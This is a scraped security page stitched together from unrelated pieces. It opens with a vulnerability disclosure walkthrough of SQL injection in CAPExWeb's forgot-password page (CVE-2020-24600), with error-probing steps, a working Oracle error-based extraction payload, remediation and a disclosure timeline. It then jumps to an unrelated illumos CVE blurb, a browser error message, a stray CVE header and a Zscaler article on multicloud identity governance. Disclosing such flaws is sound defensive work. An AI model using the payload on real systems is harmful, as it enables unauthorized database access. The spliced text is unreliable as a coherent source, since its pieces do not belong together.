1.  Visit the /capexweb/capexweb URI on the server where the capexweb client is installed.
    

_**Figure-1:** Default login page of the application._

1.  Now, fill the login form with the wrong details and submit them.
    

_**Figure-2:** Login form with invalid credentials._

_**Figure-3:** Response shows the credentials are invalid._

2.  From the error response, click on the “Forgot My User id or Password” link. 
    

Note: We cannot navigate to the capforgotpassword.jsp directly, as the application takes the user id from the previously submitted request.

_**Figure-4:** Response shows user-id as null if we navigate to capforgotpassword.jsp directly._

_**Figure-5:** Forgot password page with user-id value submitted in the login page. Now, click on the send request button._

3.  The browser sends the following request to the server.
    

_**Figure-6:** Forgot password request_

_**Figure-7:** Response from the server for invalid user id._

_**Figure-8:** Replay of forgot password page with user-id value containing a single quote returns ORA string not properly terminated error message from the database._

_**Figure-9:** Replay of forgot password page with user-id value containing two quotes returns valid error message from the application._

_**Figure-10:** Replay of forgot password page with user-id value contains comments to truncate the query after user-id returns missing right parenthesis from the database server._

_**Figure-11:** Replay of forgot password page with user-id value contains a single quote and right parenthesis returns quoted string not properly terminated error message from the database server._

_**Figure-12:** Replay of forgot password page with user-id value contains a single quote, right parenthesis, and comment returns missing right parenthesis error message from the database server._

**Note:** After analyzing the responses for different payloads, the payload needs two right parentheses to work.

_**Figure-13:** Replay of forgot password page with user-id value contains a single quote, two right parentheses, and comment returns a valid error message from the application._

**Note:** The proper execution of functionality sends an email or SMS to the user. In production servers, checking this issue may impact all the users. As we do not have a valid user id, trying for always real conditions impacts all the users in the application. So, to minimize the impact on one user, use the ROWNUM condition.

_**Figure-14:** Request with ROWNUM condition as part of the payload._

_**Figure-15:**  User id value with always true condition and ROWNUM condition does not show invalid user id or pan._

_**Figure-16:** The payload XORXX’)) or%201=ctxsys.drithsx.sn (1, (select%20sys.stragg(distinct%20banner)%20from%20v$version))-- in request to retrieve the data from the database in error information._

_**Figure-17:** The available databases in the Oracle database server._

**Impact**

A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

**Remediations**

Use parameterized queries when dealing with SQL queries that contain user input. Parameterized queries allow the database to understand which parts of the SQL query should be considered as user input, therefore solving SQL injection.

**Timeline**

 **July 01, 2020** - Discovered in our research lab

 **July 17, 2020** \- Followed up with the Vendor

 **July 29, 2020** - Followed up with the Vendor

 **October 7, 2020** -  Informed CERT-in about the vulnerability

 **November 27, 2020** - CERT-in confirmed the vulnerability fix

**Discovered by**

Cyber Security Works Pvt. Ltd.

CVE-2020-24600: 2020-24600 - SQL Injection in CAPExWeb

An issue was discovered in illumos before f859e7171bb5db34321e45585839c6c3200ebb90, OmniOS Community Edition r151038, OpenIndiana Hipster 2021.04, and SmartOS 20210923. A local unprivileged user can cause a deadlock and kernel panic via crafted rename and rmdir calls on tmpfs filesystems. Oracle Solaris 10 and 11 is also affected.

☹

Sorry, your browser does not support the technologies needed to use our web interface. Please make sure you have the latest version, and that JavaScript is enabled.

CVE-2021-43395: Topicbox

Organizations can start by integrating functions like detection, prioritization, and remediation on to a single platform.

Cloud transformation often occurs simultaneously across siloed organizational units and groups, each potentially using a different cloud for their applications and workloads. However, taking inventory of all their cloud resources and building a compliant, secure, simple, and unified strategy has become a common challenge.

It wouldn’t be surprising to see an organization with most of its workloads in AWS using Microsoft 365 and Azure Active Directory while also heavily using Google Cloud GKE and Big Query. On top of that, Oracle Cloud may also be in the mix with some autonomous database offerings. As cloud adoption matures in an organization, and as smaller cloud providers gain traction, the mix of services and cloud platforms becomes incredibly diverse and complex. In light of these challenges, organizations must still find ways to govern and secure their entire cloud infrastructure.

The answer? A framework that works across all clouds to unify detection, prioritization, and remediation of the most impactful risks facing the organization.

****Identities and Authentication Keys****

Diving into a use case around cloud identity authentication keys for access, let’s see how you can protect your organization’s crown jewels in your multicloud environment. In the cloud world, identity is perhaps the most critical cloud object to govern, monitor, detect, and remediate. Compromising a cloud identity has the largest blast radius since, frankly, the public cloud is just a bunch of public APIs that respond to authenticated requests.

Authentication keys are cryptographic entities attached to an identity that allow you to issue authenticated API requests from the Internet. Hence, these keys call for the undivided attention of any governance and security strategy. However, each cloud provider defines identity in a different way, with a completely new set of capabilities and risks.

    

The idea here is to think of an organization that wants to enforce the following policy: “Authentication keys should be rotated every 90 days, and every 30 days if they enable personally identifying information access.” This seemingly simple policy would need to take four different implementations, depending on which cloud it’s using. Additionally, the security admin would need to tailor specific policies, such as limiting the number of concurrent keys (not relevant to AWS) or enforcing expiration dates upon key creation (not relevant for secrets).

The same concept applies when an organization tries to enforce “do not allow public access to storage objects” or “only build workloads from images that are up to date.”

****Building, Securing, and Governing the Cloud****

While each cloud is unique, foundationally, they are not so different. They all have a concept of a computer instance, object and file storage, and both human and nonhuman identities, each of which can be assigned permissions. As a result, the multicloud infrastructure calls for unification between building, securing, and governing the cloud.

When building cloud deployments, organizations rely on infrastructure as code (IaC) languages like HashiCorp’s Terraform to create a unified approach to address cloud objects. Think of IaC as a higher-level language over the lower-level cloud-specific API calls.

The parallel higher-level language for securing and governing the cloud is the cloud-native application protection platform (CNAPP). CNAPP converges tools like cloud security posture management, cloud infrastructure entitlement management, cloud workload protection platform, configuration management database, and others, providing complete security for your cloud, spanning the cloud development lifecycle from build time to run time. CNAPP provides a single pane of glass for all your cloud environments.

These solutions provide a complete inventory of your cloud assets, as well as visibility into potential security gaps and risks, correlating across a broad range of signals including misconfigurations, vulnerabilities, Internet exposure, excessive permissions, and more.

Through a CNAPP, teams can enable unified detection, investigation, and enforcement of common cloud objects, as well as pitfalls such as exposed storage, unpatched compute instances, and more. Ideally, a single UI workflow allows you to enforce multicloud organization policies such as “block public access for cloud storage” or “isolate compute instances that accept traffic from the Internet and expose a service with critical vulnerabilities.”

Here are additional best practices and recommendations for securing your cloud footprint:

*   Decide whether to measure against a security framework like NIST or CIS, or your own internally developed policies. Implement these policies across the development lifecycle, with explicit definition of where to enforce action-blocking guardrails. A CNAPP can help you accomplish this.
*   Ensure your security team is diversified in terms of multicloud knowledge, e.g., AWS, Azure, and GCP.
*   Implement identity best practices, such as single sign-on and multifactor authentication, via your organization’s existing IAM provider, whenever possible. Avoid the use of cloud-specific local identities to access the cloud from the Internet.
*   Define the unified view as a prerequisite for procurement of cloud security tools. Ideally, choose tools that enable a unified approach of enforcing organizational policies across clouds.

Cloud transformation has become a vital initiative for many organizations. As you go through the cloud transformation journey, remember that your approach to security (and the tools you use) must transform as well. Whether you’re unifying siloed tools, security and DevOps teams, different cloud vendors, management, or policies and languages, bringing tools together and enforcing commonalities will benefit your organization in the long run.

Read more _Partner Perspectives_ from Zscaler.

Tag

#oracle